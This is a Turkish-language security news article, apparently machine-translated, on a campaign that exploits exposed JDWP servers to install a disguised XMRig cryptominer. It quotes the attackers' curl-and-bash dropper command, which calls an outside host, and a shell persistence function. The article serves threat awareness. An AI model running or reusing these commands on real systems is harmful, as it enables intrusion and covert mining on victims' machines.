Yeni bir siber saldırı dalgası, Java Hata Ayıklama Tel Protokolü (JDWP) sunucularını internete yanlışlıkla ortaya çıkaran kuruluşları hedefliyor ve saldırganlar, gelişmiş kriptominasyon kötü amaçlı yazılımları dağıtmak için bu gözden kaçan giriş noktasını kullanıyor.
Java platformunda standart bir özellik olan JDWP, geliştiricilerin canlı uygulamaları incelemesine izin vererek uzaktan hata ayıklamayı kolaylaştırmak için tasarlanmıştır.
Bununla birlikte, JDWP üretim sistemlerine erişilebilir kaldığında – genellikle yanlış yapılandırma veya canlı ortamlarda geliştirme bayraklarının kullanımı nedeniyle – uzaktan kod yürütme için güçlü bir vektör haline gelir.
Bu tehdidin ortaya çıkışı hızlı sömürü döngüleri ile işaretlendi. Gözlenen birkaç olayda, saldırganlar maruz kaldıktan sonraki saatler içinde savunmasız makinelerden ödün verebildiler.
Saldırı akışı tipik olarak açık JDWP bağlantı noktaları için kitle internet taramaları ile başlar, en çok bağlantı noktası 5005. Bir hedef belirlendikten sonra, saldırgan hizmetin etkin olduğunu doğrulamak için bir JDWP el sıkışma başlatır ve Java Virtual Makinesi’ne (JVM) etkileşimli erişim elde eder.
Bu erişim, düşmanın yüklü sınıfları numaralandırmasına ve yöntemleri çağırmasına izin verir ve sonuçta ana bilgisayarda keyfi komut yürütme sağlar.
Wiz analistleri, bu kampanyayı, popüler bir CI/CD aracı olan TeamCity’yi çalıştıran Honeypot sunucularına karşı sömürü girişimlerini gözlemledikten sonra belirledi.
Saldırganlar, algılamadan kaçınmak için sert kodlanmış bir yapılandırmaya sahip değiştirilmiş bir XMRIG Cryptominer’ı dağıtarak yüksek derecede otomasyon ve özelleştirme gösterdi.
Saldırı akışı
Özellikle, kötü amaçlı yazılım, hedef cüzdan adresini gizlemek için madencilik havuzu vekillerini kullandı ve yasadışı madencilik operasyonunu izleme veya bozma çabalarını karmaşıklaştırdı.
Bu saldırıların etkisi önemlidir. JDWP’yi kötüye kullanarak, tehdit aktörleri sadece kriptominerleri dağıtmakla kalmaz, aynı zamanda derin kalıcılık oluşturabilir, sistem süreçlerini manipüle edebilir ve potansiyel olarak uzlaşmış ortamdaki diğer varlıklara dönebilir.
Yükün gizli doğası, meşru sistem kamu hizmetleri ile karışma yeteneği ile birleştiğinde, uzun süre tespit edilmemiş aktivite ve kaynak tahliyesi riskini artırır.
Enfeksiyon mekanizmasına odaklanan saldırganlar, JDWP’nin doğrudan protokol aracılığıyla kabuk komutlarını enjekte etmek ve yürütmek için kimlik doğrulama eksikliğini kullanıyor.
Bir oturum oluşturduktan sonra, genellikle LogService.sh gibi bir damlalık komut dosyasını indirirler:—
curl -o /tmp/logservice.sh -s https://canonicalconnect[.]com/logservice.sh
bash /tmp/logservice.shBu komut dosyası, rakip madencileri öldürmek, logrotate olarak gizlenmiş kötü amaçlı XMRIG ikili olarak indirmek ve kullanıcının yapılandırma dizinine yüklemek için tasarlanmıştır.
Komut dosyası daha sonra kabuk başlatma dosyalarını değiştirmek, CRON işleri oluşturmak ve sahte bir sistem hizmeti yüklemek de dahil olmak üzere birden fazla kalıcılık mekanizması oluşturur.
Aşağıdaki alıntı, komut dosyasının kabuk yapılandırması yoluyla nasıl kalıcılığı sağladığını göstermektedir:-
add_to_startup() {
if [ -r "$1" ]; then
if ! grep -Fxq "$EXEC >/dev/null 2>&1" "$1"; then
echo "$EXEC >/dev/null 2>&1" >> "$1"
fi
fi
}.webp)
Enfeksiyon zinciri hem etkili hem de esnektir, Cryptominer’ın yeniden başlatmalardan ve kullanıcı girişlerinden kurtulmasına izin verir.
Saldırganların meşru ses çıkarma süreç isimlerini ve sistem konumlarını kullanması, algılama ve iyileştirme çabalarını daha da karmaşıklaştırır, bu da uyanık konfigürasyon yönetimine olan ihtiyacı ve maruz kalan hizmetlerin sağlam izlenmesini vurgular.
Canlı kötü amaçlı yazılım davranışını araştırın, bir saldırının her adımını izleyin ve daha hızlı, daha akıllı güvenlik kararlarını alın -> Herhangi birini deneyin. Şimdi